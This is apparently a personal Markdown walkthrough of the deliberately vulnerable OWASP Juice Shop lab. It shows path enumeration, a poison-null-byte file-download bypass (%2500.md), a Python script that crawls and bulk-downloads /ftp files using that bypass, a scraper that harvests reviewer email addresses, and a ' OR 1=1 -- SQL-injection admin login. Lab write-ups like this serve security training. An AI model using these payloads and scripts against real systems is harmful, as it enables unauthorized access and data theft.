# Juice Shop Walkthrough

This is a  Walkthrough for OWASP Juice Shop vulnerable web application.

[[_TOC_]]

<br/>



## STEP 0: Installation

> 📝 **_Note:_**  
> Firts, I installed the Fruid Shop application following the WebSploit labs documentation. But there is a caveat, some of the challenges are disabled for security reasons on the **Docker** version. So, I used the WebSploit labs **Vagrant** version adapted to execute the application **From Sources** (not from Docker that is setup by default in the Vagrant version).

Go to the folder `resources/websploit-labs/installation` and run the command:

```shell
vagrant up
```

It will do the following:
1. Create a generic **Ubuntu virtual machine** in **VirtualBox**.  
2. Install the necessary **applications** to run the Juice Shop.
3. Download the git repository **source code**.
4. Install the necessary **dependencies**.
5. **Start** the application.
6. Start an Apache server to **redirect** the traffic from **external** port **80** to **internal** port **3000**.

Wait for the server to start (may take some time) and navigate to `http://192.168.56.110` (ip address of the virtual machine). 

   ![Screenshot 01](../images/juice_shop_walkthrough_001.jpg)

> 📝 **_Note:_**  
> The virtual machine uses a host-only network.

<br/>



## STEP 1: Finding the Score Board

> ❓ **_Challenge:_**  
> Find the carefully hidden 'Score Board' page.

1. Navigate to `http://192.168.56.110`.
2. Open the developer tools in the browser (press **F12** on Firefox).
3. Open the "**Debugger**" tab in the developer tools.
4. Cick on the different "**Sources**" that you can see.
   
   - index.html
   - main.js
   - 103.js
   - polyfills.js
   - runtime.js
   - vendor.js
   - styles.css

   > 📝 **_Note:_**  
   > You can show the source page pretty formated by clicking on the "**{ }**" button in the bottom left corner of the developer tools.

5. Search with regular expressions for the "Score Board" page. I used the following regular expression to search for the word "score" and show the next 5 characters:

   ```regex
   /score.{5}/gim
   ```

6. I found a list of diferent paths in the file `main.js` that contains the word "score":

   ```javascript
   ...
     {
       path: 'score-board', // Path to the score board page
       component: go
     },
   ...
   ```

   ![Screenshot 02](../images/juice_shop_walkthrough_002.jpg)

> 💡 **_Solution:_**  
> The score board page is located at `http://192.168.56.110/#/score-board`.

![Solution STEP 1](../images/juice_shop_walkthrough_003.jpg)

##### ⭐ &nbsp; **_Score Board_** challenge solved

<br/>



## STEP 2: Enumerating paths

After finding the **score board** page, we can use regular expressions to find all the possible paths in the `main.js` file.

To facilitate the enumeration we can download the source code files from the fruit shop homepage.

```shell
wget http://192.168.56.110/index.html
wget http://192.168.56.110/main.js
wget http://192.168.56.110/103.js
wget http://192.168.56.110/polyfills.js
wget http://192.168.56.110/runtime.js
wget http://192.168.56.110/vendor.js
wget http://192.168.56.110/styles.css
```
> 📝 **_Note:_**  
> These files can be found in the directory `resources/juice-shop/evidences/`.

List of all the paths that match the regular expression `/path: "(.*)",/gim` or `/"([^"]*\/[^"]+)"/gim`:

- 2fa
- 2fa/enter
- about
- accounting
- address
- address/create
- address/edit
- address/saved
- address/select
- administration
- api
- api/Addresss
- api/BasketItems
- ...

> 📝 **_Note:_**  
> You can find all the paths found in the file `resources/juice-shop/scripts/resources_paths.dic`.

> 🔍 **_Conclusion:_**  
> We can see that there are 2 different **API** calls, one for `api` and one for `rest`.  
> There are also other interesting paths like `accounting`, `administration` or `web3-sandbox`.  
> We can find folders for static files like `ftp` and `assets`.  
> Other curious paths are `recycle`, `juicy-nft` or `bee-haven`.

##### ⭐ &nbsp; **_Web3 Sandbox_** challenge solved
> Go to `http://192.168.56.110/web3-sandbox`.

##### ⭐ &nbsp; **_Error handling_** challenge solved
> Go to `http://192.168.56.110/api`.

<br/>



## STEP 3: Robots.txt

In the `robots.txt` file we can see that the site is not indexing the folder `/ftp`.

```txt
User-agent: *
Disallow: /ftp
```

> 🔍 **_Conclusion:_**  
> The site may use the folder `/ftp` to serve confidential data.  

We can ensure that, visiting the url `http://192.168.56.110/ftp/` and downloading one of the files.

![Screenshot 05](../images/juice_shop_walkthrough_005.jpg)

##### ⭐ &nbsp; **_Confidential Document_** challenge solved
> Download `http://192.168.56.110/ftp/incident-support.kdbx`.

<br/>

If we try to download a file that does not have the extension `.md`, `.pdf` or `.kdbx`, we will get an error.

![Screenshot 06](../images/juice_shop_walkthrough_006.jpg)

> 🔍 **_Conclusion:_**  
> This site may be vulnerable to **Null Byte** attacks.

If we try to apply the **poison null byte** technique, adding **%2500.md** to the end of the url, we will download the file without any server error.

> 📝 **_Note:_**  
> A **null byte** is a character like `%2500` that can be added to the **url**. The text is considered as a **null character** and it is used to **terminate** the url.  
> This technique can prevent the server from interpreting it as an **unauthorized extension** to be downloaded. You can apply a new url extension after the null byte. The system only will interpret all the characters **before** the null byte, bypassing the extension restriction.  
>For **example** `http://192.168.56.110/ftp/coupons_2013.md.bak%2500.md`.

##### ⭐⭐⭐⭐ &nbsp; **_Poison Null Byte_** challenge solved  
> Download `http://192.168.56.110/ftp/coupons_2013.md.bak%2500.md`.

##### ⭐⭐⭐⭐ &nbsp; **_Forgotten Sales Backup_** challenge solved
> Download `http://192.168.56.110/ftp/coupons_2013.md.bak%2500.md`.

<br/>

I made a python script that will enumerate all the files in the specified `BASE_URL` url.  
Changing the constant `DOWNLOAD = True` will download all the files in the `LOCAL_PATH` folder.  
It uses a **poison null byte** technique to download the files that can not be downloaded.  
You can edit the constant `POISON` to add another **null byte** string to the end of the url.  
The script file name is `enumerate_ftp_files.py`:

```python
import requests
import os
from bs4 import BeautifulSoup

DOWNLOAD   = False # Set to True if you want to download the files
BASE_URL   = "http://192.168.56.110/ftp" # URL of the FTP server
LOCAL_PATH = "ftp" # Local directory to save files
POISON     = "%2500.md" # Poison Null Byte extension
INVALID_MARKERS = ['', '.', '..', './', './.', './..', '../', '../.', '../..', '/'] # Invalid directory markers

def list_files(url = BASE_URL):
    response = requests.get(url)
    # Detect if the response is not an HTML page
    if not response.ok or not response.content.startswith(b'<!DOCTYPE html>'):
        return []
    # Parse the HTML content
    soup = BeautifulSoup(response.content, 'html.parser')
    return [link.get('href') for link in soup.find_all('a') if link.get('href') not in INVALID_MARKERS]

def list_directory(slug = '/'):
    files = list_files(BASE_URL + slug)
    for file in files:
        file_url = BASE_URL + '/' + file
        # Skip if the file has the invalid markers or has the same name as the parent directory
        if file in INVALID_MARKERS or file.rstrip('/') == slug.split('/')[-1]:
            continue
        # Check if the URL points to a directory
        if list_files(file_url).__len__() != 0:
            if DOWNLOAD:
                print(f"Creating local directory: {LOCAL_PATH + '/' + file}")
                os.makedirs(LOCAL_PATH + '/' + file, exist_ok=True)
            # Recursively handle subdirectories
            list_directory(slug + file)
            continue
        # It's a file or an empty directory
        print(file)
        if not DOWNLOAD:
            continue
        try:
            # Send a GET request to the URL
            response = requests.get(file_url)
            response.raise_for_status() # Raise an exception if the request was unsuccessful
            # Write the content of the request to a local file
            with open(LOCAL_PATH + '/' + file, 'wb') as f:
                f.write(response.content)
            print(f"Downloaded file to {LOCAL_PATH + '/' + file}")
        except Exception as e:
            try:
                response = requests.get(file_url + POISON)
                response.raise_for_status() # Raise an exception if the request was unsuccessful
                # Write the content of the request to a local file
                with open(LOCAL_PATH + '/' + file, 'wb') as f:
                    f.write(response.content)
                print(f"Downloaded file with Poison Null Byte extension to {LOCAL_PATH + '/' + file}")
            except Exception as e:
                print(f"Failed to download file: {e}")

if DOWNLOAD:
    print(f"Creating local directory: {LOCAL_PATH}")
    os.makedirs(LOCAL_PATH, exist_ok=True)

# Start
list_directory()
```

> 📝 **_Note:_**  
> I used various python libraries to make the script.  
> You can install these libraries with `pip install requests beautifulsoup4`.  
> You can find the script in the directory `resources/juice-shop/scripts`.

Execute the script with the command:

```shell
python enumerate_ftp_files.py
```

List of all the files found in `http://192.168.56.110/ftp/`:

- quarantine/juicy_malware_linux_amd_64.url
- quarantine/juicy_malware_linux_arm_64.url
- quarantine/juicy_malware_macos_64.url
- quarantine/juicy_malware_windows_64.exe.url
- acquisitions.md
- announcement_encrypted.md
- coupons_2013.md.bak
- eastere.gg
- encrypt.pyc
- incident-support.kdbx
- legal.md
- package.json.bak
- suspicious_errors.yml

##### ⭐⭐⭐⭐ &nbsp; **_Forgotten Developer Backup_** challenge solved
> Download `http://192.168.56.110/ftp/package.json.bak%2500.md`.

##### ⭐⭐⭐⭐ &nbsp; **_Misplaced Signature File_** challenge solved
> Download `http://192.168.56.110/ftp/suspicious_errors.yml%2500.md`.

##### ⭐⭐⭐⭐ &nbsp; **_Easter Egg_** challenge solved
> Download `http://192.168.56.110/ftp/eastere.gg%2500.md`.

<br/>

Inside the `eastere.gg` file we can see that there is an additional Easter Egg.

```txt
"Congratulations, you found the easter egg!"
- The incredibly funny developers

...

...

...

Oh' wait, this isn't an easter egg at all! It's just a boring text file! The real easter egg can be found here:

L2d1ci9xcmlmL25lci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnR0L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA==

Good luck, egg hunter!  
```

> 🔍 **_Conclusion:_**  
> It seems to use **Base64** encoding.

We can use the webpage utility **[CiberChef](https://gchq.github.io/CyberChef/)** to try to decode the easter egg.

```txt
/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt
```

> 🔍 **_Conclusion:_**  
> There is some type of letter displacement, so it can be a **Rot13 / Caesar** cipher encryption.  

Because **Rot13 / Caesar** is a very week encryption technique, we can brute force it to see all the possibilities.  
In all 25 possible combinations, we can read a comprhensive path using a displacement of 13 characters.

```txt
...
Amount = 13: /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg
...
```

![Screenshot 07](../images/juice_shop_walkthrough_007.jpg)

Now whe can try to access to this path (`http://192.168.56.110/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg`) and see the real easter egg.

![Screenshot 08](../images/juice_shop_walkthrough_008.jpg)

##### ⭐⭐⭐⭐ &nbsp; **_Nested Easter Egg_** challenge solved

<br/>



## STEP 4: Enumerating product reviewers

In the home page we can see the list of products. Some of them have one or more review with the mail of the author.

If we inspect the source code we can se that the information is requested dinamically from the server.  
For example, for the first product it's doing a **GET** request to `http://192.168.56.110/rest/products/1/reviews`.

![Screenshot 04](../images/juice_shop_walkthrough_004.jpg)

The information is returned in **JSON** format and contains the author and the review.

```json
{
    "status": "success",
    "data": [
        {
            "message": "I bought it, would buy again. 5/7",
            "author": "admin@juice-sh.op",
            "product": 3,
            "likesCount": 0,
            "likedBy": [],
            "_id": "6a9dcvGH9pC3uLw8F",
            "liked": true
        }
    ]
}
```

If we try to change the product ID, we can see that the information is requested too.  

With this information we can create a python script that will enumerate all the reviewers for the first 100 products ids (script file name: `enumerate_authors.py`).

```python
import requests

# Base URL of the API endpoint
BASE_URL = "http://192.168.56.110/rest/products/{}/reviews"

# Function to get reviews for a specific product ID
def get_reviews(product_id):
    response = requests.get(BASE_URL.format(product_id))
    if response.status_code == 200:
        return response.json().get('data', [])
    else:
        print(f"Failed to get reviews for product ID {product_id}")
        return []

# Dictionary to hold authors and their review counts
author_review_counts = {}

# Enumerate all reviews for product IDs from 1 to 100 and count them per author
for product_id in range(1, 101):
    reviews = get_reviews(product_id)
    for review in reviews:
        author = review['author']
        # Initialize or increment the author's review count
        author_review_counts[author] = author_review_counts.get(author, 0) + 1

# Sort authors by number of reviews in descending order
sorted_authors = sorted(author_review_counts.items(), key=lambda item: item[1], reverse=True)

# Print the sorted list of authors and their review counts
print("Authors sorted by number of reviews on descending order (number of reviews : author):")
for author, count in sorted_authors:
    print(f"{count} : {author}")
```

> 📝 **_Note:_**  
> We can use the **requests** library to make HTTP requests.  
> It can be installed with `pip install requests`.

And execute this script with the following command.

```shell
python enumerate_authors.py
```

Here is the list of te authors with their respective number of reviews done:

| Count | Author |
| ----- | ------------------------- |
| 6     | bender@juice-sh.op        |
| 5     | mc.safesearch@juice-sh.op |
| 3     | uvogin@juice-sh.op        |
| 3     | jim@juice-sh.op           |
| 2     | admin@juice-sh.op         |
| 2     | bjoern@owasp.org          |
| 1     | morty@juice-sh.op         |
| 1     | stan@juice-sh.op          |
| 1     | accountant@juice-sh.op    |

> 🔍 **_Conclusion:_**  
> As we can see, the **bender** author have done the most reviews (**6**).  
> There are 2 authors with a caracteristic mail: **admin** and **accountant**.  
> There is only one user with a non `@juice-sh.op` mail: **bjoern**.

<br/>



## STEP 5: Login page

We can go to the login page (**Account > Login**) to see if there are any vulnerabilities (url `http://192.168.56.110/#/login`).

![Screenshot 09](../images/juice_shop_walkthrough_009.jpg)

The first we can try is a simple **SQL injection** attack using `' OR 1=1 --` in the **username** field and some random data in the **password**.

> 📝 **_Note:_**  
> The character `'` is used to **escape** the SQL query.  
> `OR 1=1` is used to ensure that the query is always **true**.  
> The text `--` is used to **prevent to execute** the next part the query because it represents the beginning of a comment in SQL language.

Bingo! We have found a vulnerability in the login page. Now we have access as the **admin** user.

![Screenshot 10](../images/juice_shop_walkthrough_010.jpg)

##### ⭐⭐ &nbsp; **_Login Admin_** challenge solved

<br/>